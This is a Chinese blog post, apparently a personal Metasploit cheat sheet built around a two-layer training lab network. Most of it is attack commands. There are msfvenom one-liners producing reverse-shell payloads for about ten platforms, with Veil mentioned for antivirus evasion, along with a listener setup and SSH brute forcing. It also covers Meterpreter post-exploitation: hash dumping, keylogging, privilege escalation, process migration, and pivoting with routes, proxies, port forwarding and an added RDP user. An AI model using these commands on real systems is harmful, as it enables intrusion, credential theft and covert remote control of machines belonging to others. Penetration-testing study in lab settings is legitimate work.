metasploit备忘录

前言

考研大半年不碰安全,忘得差不多了都==、 再花点时间拿起来,记一下msf常用姿势,方便以后之用。

环境

环境借助metasploit魔鬼训练营提供的内网环境,两层内网,
第一层内网两台主机,一台跳板机,二层内网一台主机

一层:
10.10.10.0/24
二层:
192.168.10.0/24
跳板机:
vmware 添加两个网卡,一个NAT,一个HOST_ONLY 模式。

基础环境及魔鬼训练营电子书请戳这里
网盘失效后在下方评论,看到后会及时更改链接 :)

操作

常用命令:

1
2
3
4
5
6
7
8
9
10
11
12
show exploits – 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具
show options – 查看该模块所有可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 进入使用某渗透攻击模块
back – 回退
set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数
save – 将当前设置值保存下来,以便下次启动MSF终端时仍可使用

生成可执行文件 搭配Veil 免杀

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

快捷键
1
2
Ctrl+z 把会话放到后台
Ctrl+c 结束会话
爆破ssh

ssh_login

sshexec

爆破得到用户名密码以后,登录系统 得到一个shell

psexec

得到windows密码时,获取shell用

监听 (handler)
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options
set ExitOnSession false 让connection保持连接(即使一个连接退出,仍然保持listening状态)
exploit -j –z -j(作为job开始运行)和-z(不立即进行session交换--也即是自动后台运行)

生成可执行文件 在目标机执行 反弹shell

Meterpreter 后渗透

常用命令:

1
2
3
4
5
6
7
8
9
10
11
sysinfo 系统信息
screenshot 截图
ls 查看目录下文件
ps 查看进程
download 远程目录 本机目录
upload 本地目录 远程目录
getuid 查看当前用户权限
getsystem 提升权限
hashdump 导出hash
run post/windows/capture/keylog_recorder 键盘记录
migrate pid 进程迁移

内网部分

以ubuntu靶机为例,两个网卡,eth0为10.10.10.0/24段,eth1为192.168.10.0/24

二层为xp靶机 192.168.10.0/24 段

查看一下网段

1
run get_local_subnets

autoroute 添加路由

1
2
3
run autoroute –h #查看帮助
run autoroute -s 192.168.10.0/24 #通向内网的路由
run autoroute –p #查看添加的路由

扫一下网段,此处为验证,所以只扫描二层靶机
使用portscan模块,background 将session会话放到后台

添加sock4a


使用proxychain代理
编辑/etc/proxychains/conf 添加127.0.0.1:8887
ping一下xp靶机 看代理是否可行

portfwd
1
2
3
4
5
6
7
8
9
10
portfwd add -l 1234 -p 3389 -r <目标IP> 端口转发
-l:本地端口
-p:远程端口
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
portfwd delete -i 1
将目标机的3389端口转发到特定IP的1234端口 实现端口转发
linux下可以使用rdesktop访问win 3389。

三层内网类似的操作,添加路由,使用代理探索内网。

其他

提权

Metasploit权限提升全剧终

常用扫描脚本
1
2
3
4
5
6
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/jboss_vulnscan
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/oracle/oracle_login
.......

参考链接

https://www.bodkin.ren/index.php/archives/412/
https://xz.aliyun.com/t/2536
https://www.freebuf.com/sectool/56432.html
……..

补充

一些好的内网代理转发的文章。。
http://www.zerokeeper.com/experience/network-port-forwarding-and-penetration.html
https://xz.aliyun.com/t/1862
https://www.anquanke.com/post/id/85494
……..

本文标题:metasploit备忘录

文章作者:tkcharlotte

发布时间:2019年01月22日 - 11:01

最后更新:2019年03月04日 - 10:03

原始链接:boombao.net/2019/01/22/metasploit备忘录/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------本文结束感谢您的阅读-------------